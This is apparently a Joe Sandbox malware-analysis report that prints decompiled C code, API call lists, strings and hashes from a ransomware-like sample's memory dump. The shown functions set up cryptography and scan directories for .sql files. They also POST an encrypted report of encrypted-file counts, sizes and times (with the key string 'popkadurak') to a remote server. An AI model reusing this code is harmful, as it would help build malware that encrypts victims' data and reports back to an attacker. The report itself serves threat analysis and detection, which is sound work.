RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7426
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7447
RegCloseKey.KERNEL32(?,?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7457
GetLastError.KERNEL32(?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7466
RegCloseKey.ADVAPI32(?,?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB746F

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: ef994be54dd724921188d27d58642441ef7d4b7ff11691cf3c4d922a8341cead
Instruction ID: 7f1b9227ae579d956ba529107f69cf3700b59d887f690656698de17afb6a5b0e
Opcode Fuzzy Hash: ef994be54dd724921188d27d58642441ef7d4b7ff11691cf3c4d922a8341cead
Instruction Fuzzy Hash: 7D011E32A0011DAFCB109F95ED05DEA7B6CEB08762F504166FD05D6111D7729A25AFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0FBB6550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0FBB63E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0fbb6553
0x0fbb6554
0x0fbb6565
0x0fbb656e
0x0fbb657f
0x0fbb6588
0x0fbb658d
0x0fbb6597
0x0fbb65b5
0x0fbb65b9
0x0fbb65c3
0x0fbb65c8
0x0fbb65c8
0x0fbb65d2
0x0fbb65df

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0FBB4B9E), ref: 0FBB6565
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0FBB4B9E), ref: 0FBB657F

Part of subcall function 0FBB63E0: CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0FBB4B96,?,0FBB4B9E), ref: 0FBB63F8
Part of subcall function 0FBB63E0: GetLastError.KERNEL32(?,0FBB4B9E), ref: 0FBB6402
Part of subcall function 0FBB63E0: CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBB4B9E), ref: 0FBB641E

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: e91686029e539185a4aa758dc935f2ed0069d03a9ac49567e6e540452e3d99f5
Instruction ID: 8b794522abf91f28aba5680e05ae7bd53be6588aab0b91d449965502e767cfb7
Opcode Fuzzy Hash: e91686029e539185a4aa758dc935f2ed0069d03a9ac49567e6e540452e3d99f5
Instruction Fuzzy Hash: 7D11B774A40208EBD704CF88DA55F99B7F9EB88705F208188E908AB381D7B5AF119F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FBB53D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0FBB53D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0FBB5F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0FBB33E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0FBB5350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0FBB7E40( &_v104);
						_v92 = E0FBB5220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xfbbfb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xfbbfb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xfbbfb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xfbbfb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xfbbfb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xfbbfb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0FBB8050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0FBB53D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xfbc2a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xfbc2a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

0x0fbb53d9
0x0fbb53db
0x0fbb53e5
0x0fbb53ed
0x0fbb53f0
0x0fbb53f0
0x0fbb53f6
0x0fbb53fc
0x0fbb5401
0x0fbb540c
0x0fbb540c
0x0fbb5408
0x0fbb5408
0x0fbb5408
0x0fbb540e
0x0fbb541b
0x0fbb5421
0x0fbb5423
0x0fbb54dc
0x00000000
0x0fbb5429
0x0fbb5429
0x0fbb542e
0x0fbb5433
0x0fbb5436
0x0fbb543a
0x0fbb543f
0x0fbb5447
0x0fbb54e4
0x0fbb54e9
0x0fbb54ea
0x0fbb54eb
0x0fbb54ec
0x0fbb54ed
0x0fbb54ee
0x0fbb54ef
0x0fbb54f6
0x0fbb54f7
0x0fbb54f8
0x0fbb54fa
0x0fbb54fd
0x0fbb5501
0x0fbb5504
0x0fbb550f
0x0fbb5525
0x0fbb552c
0x0fbb5542
0x0fbb5546
0x0fbb5549
0x0fbb554b
0x0fbb5558
0x0fbb5558
0x0fbb5558
0x0fbb554d
0x0fbb554d
0x0fbb5550
0x0fbb5552
0x00000000
0x0fbb5554
0x0fbb5554
0x0fbb5554
0x0fbb5552
0x0fbb555e
0x0fbb5564
0x0fbb556d
0x0fbb5572
0x0fbb557a
0x0fbb557f
0x0fbb5587
0x0fbb558c
0x0fbb5594
0x0fbb5599
0x0fbb55a1
0x0fbb55a6
0x0fbb55ae
0x0fbb55b3
0x0fbb55bc
0x0fbb55c5
0x0fbb55c9
0x0fbb55ca
0x0fbb55d2
0x0fbb55d7
0x0fbb55e1
0x0fbb55e2
0x0fbb55e3
0x0fbb55e9
0x0fbb55ee
0x0fbb55ef
0x0fbb55f4
0x0fbb55f6
0x0fbb55f8
0x0fbb55fc
0x0fbb5601
0x0fbb5609
0x0fbb5610
0x0fbb5615
0x0fbb5617
0x0fbb5627
0x0fbb5627
0x0fbb5619
0x0fbb5619
0x0fbb561c
0x0fbb561e
0x0fbb5623
0x0fbb5623
0x0fbb561e
0x0fbb5617
0x0fbb5601
0x0fbb5637
0x0fbb5643
0x0fbb564d
0x0fbb564f
0x0fbb5652
0x0fbb5654
0x0fbb5657
0x0fbb5657
0x0fbb5665
0x0fbb544d
0x0fbb544d
0x0fbb5452
0x0fbb5459
0x0fbb545c
0x0fbb545f
0x0fbb5466
0x0fbb546d
0x0fbb5481
0x0fbb548a
0x0fbb548e
0x0fbb5492
0x0fbb5492
0x0fbb548e
0x0fbb549e
0x0fbb54a5
0x0fbb54ad
0x0fbb54af
0x0fbb54af
0x0fbb54b6
0x0fbb54be
0x0fbb54be
0x0fbb54c0
0x0fbb54c3
0x0fbb54cd
0x0fbb54db
0x0fbb54db
0x0fbb5447

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB53DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB53F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FBB541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB5477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB5481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB5492
HeapFree.KERNEL32(00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB54AD
HeapFree.KERNEL32(00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB54BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB54CD
GetLastError.KERNEL32(?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB54DC
lstrlenA.KERNEL32(00000000,00000000,00000000,74CB6980), ref: 0FBB5512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBB5532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FBB5544
lstrcatA.KERNEL32(00000000,?), ref: 0FBB555E
lstrlenA.KERNEL32(00000000), ref: 0FBB55B3
lstrlenW.KERNEL32(?), ref: 0FBB55BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0FBB55DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB5637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FBB5643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FBB564D
InternetCloseHandle.WININET(0FBB581B), ref: 0FBB5657

Strings

popkadurak, xrefs: 0FBB55E9
POST, xrefs: 0FBB55CA

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: 10c37e5b615ab2d8c50d0fa273ffcacde6c35b3b3e7963949e2db99e873c73b3
Instruction ID: 1d2d8b0d43d54c558be9dbf902c9da68c8f6496aa745b6464ae1649cc8164336
Opcode Fuzzy Hash: 10c37e5b615ab2d8c50d0fa273ffcacde6c35b3b3e7963949e2db99e873c73b3
Instruction Fuzzy Hash: 0071B271E00309AADB209BAAEC45BFEBB7CEB89712F144159EA05B3141DBB89541CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FBB5670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0FBB3BC0( &_v164);
				E0FBB7490( &_v164, _t82);
				E0FBB72A0( &_v164);
				E0FBB70A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xfbc2a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xfbc2a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0FBB5F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0FBB54F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0FBB7D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x0fbb5670
0x0fbb5670
0x0fbb5690
0x0fbb5693
0x0fbb5696
0x0fbb5698
0x0fbb569d
0x0fbb56a9
0x0fbb56ab
0x0fbb569f
0x0fbb569f
0x0fbb569f
0x0fbb56a5
0x0fbb56a5
0x0fbb56ad
0x0fbb56bf
0x0fbb56c8
0x0fbb56ca
0x0fbb56cb
0x0fbb56d0
0x0fbb56d2
0x0fbb56d3
0x0fbb56d5
0x0fbb56d6
0x0fbb56d8
0x0fbb56d9
0x0fbb56db
0x0fbb56dc
0x0fbb56de
0x0fbb56e1
0x0fbb56e3
0x0fbb56e4
0x0fbb56ec
0x0fbb56f7
0x0fbb5702
0x0fbb5718
0x0fbb571e
0x0fbb5724
0x0fbb572a
0x0fbb572f
0x0fbb5739
0x0fbb5739
0x0fbb5757
0x0fbb5759
0x0fbb5760
0x0fbb576d
0x0fbb5773
0x0fbb5773
0x0fbb577b
0x0fbb5780
0x0fbb578f
0x0fbb57a6
0x0fbb57a8
0x0fbb57a8
0x0fbb57be
0x0fbb57be
0x0fbb57cb
0x0fbb57ce
0x0fbb57d0
0x0fbb57d3
0x0fbb57d8
0x0fbb57e1
0x0fbb57e1
0x0fbb57da
0x0fbb57da
0x0fbb57df
0x00000000
0x00000000
0x0fbb57df
0x0fbb57e9
0x0fbb57ef
0x0fbb57f1
0x0fbb57f4
0x0fbb57f4
0x0fbb57f9
0x0fbb57ff
0x0fbb5801
0x0fbb5801
0x0fbb5803
0x0fbb580a
0x0fbb57f4
0x0fbb5816
0x0fbb5830
0x0fbb583d
0x0fbb5845
0x0fbb5854
0x0fbb5858
0x0fbb585e

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0FBB5696
wsprintfW.USER32 ref: 0FBB56BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FBB5708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FBB571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBB5739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0FBB574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0FBB5757
wsprintfA.USER32 ref: 0FBB576D
CryptBinaryToStringA.CRYPT32(00000000,74CB66A0,40000001,00000000,?), ref: 0FBB579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0FBB57A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FBB57B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0FBB57C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FBB57CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FBB57EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FBB5804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBB583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBB5854

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0FBB56B9
popkadurak, xrefs: 0FBB5746, 0FBB5762

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: c28224c6ecd8d697079c138333ca8920355e2cee79bee2a91a22e9ca894730c2
Instruction ID: 12b88e516196d2b1c18c8764d5ccfdf02d856fcc949e5253e22cdc7a4feafe4f
Opcode Fuzzy Hash: c28224c6ecd8d697079c138333ca8920355e2cee79bee2a91a22e9ca894730c2
Instruction Fuzzy Hash: 78518274A40308BFEB249B65EC86FEE7B6CEB45701F540098FA05A7181DAF4AA11CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB6BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0FBB8260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0FBB6B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x0fbb6bab
0x0fbb6baf
0x0fbb6bbe
0x0fbb6bc1
0x0fbb6bc4
0x0fbb6bde
0x0fbb6be3
0x0fbb6be6
0x0fbb6bf0
0x0fbb6c00
0x00000000
0x0fbb6c1c
0x0fbb6c24
0x0fbb6c2b
0x0fbb6c31
0x0fbb6c34
0x0fbb6c39
0x0fbb6d08
0x0fbb6d08
0x00000000
0x0fbb6c40
0x0fbb6c40
0x0fbb6c46
0x0fbb6c49
0x0fbb6c4a
0x00000000
0x00000000
0x00000000
0x0fbb6c4a
0x0fbb6c4e
0x00000000
0x0fbb6c54
0x0fbb6c5a
0x0fbb6c5e
0x00000000
0x0fbb6c64
0x0fbb6c77
0x0fbb6c82
0x0fbb6c86
0x0fbb6c8f
0x0fbb6ca0
0x0fbb6ca4
0x0fbb6cb7
0x0fbb6cce
0x0fbb6cd4
0x0fbb6cde
0x0fbb6cde
0x0fbb6ce9
0x0fbb6ce9
0x0fbb6cef
0x0fbb6cef
0x0fbb6cf3
0x0fbb6cf9
0x0fbb6cfe
0x0fbb6d0a
0x0fbb6d0f
0x00000000
0x0fbb6d0f
0x0fbb6cfe
0x0fbb6c5e
0x0fbb6c4e
0x0fbb6c39
0x00000000
0x0fbb6d12
0x0fbb6d22
0x0fbb6d2d
0x0fbb6d3b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6BB2
lstrcatW.KERNEL32 ref: 0FBB6BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6BD2
lstrcmpW.KERNEL32(?,0FBBFF48,?,?), ref: 0FBB6BFC
lstrcmpW.KERNEL32(?,0FBBFF4C,?,?), ref: 0FBB6C12
lstrcatW.KERNEL32 ref: 0FBB6C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0FBB6C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FBB6C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FBB6C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FBB6C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FBB6C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FBB6CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0FBB6CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBB6CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0FBB6CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0FBB6D1C
FindClose.KERNEL32(?,?,?), ref: 0FBB6D2D

Strings

*******************, xrefs: 0FBB6CB9, 0FBB6CC9
.sql, xrefs: 0FBB6C54

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
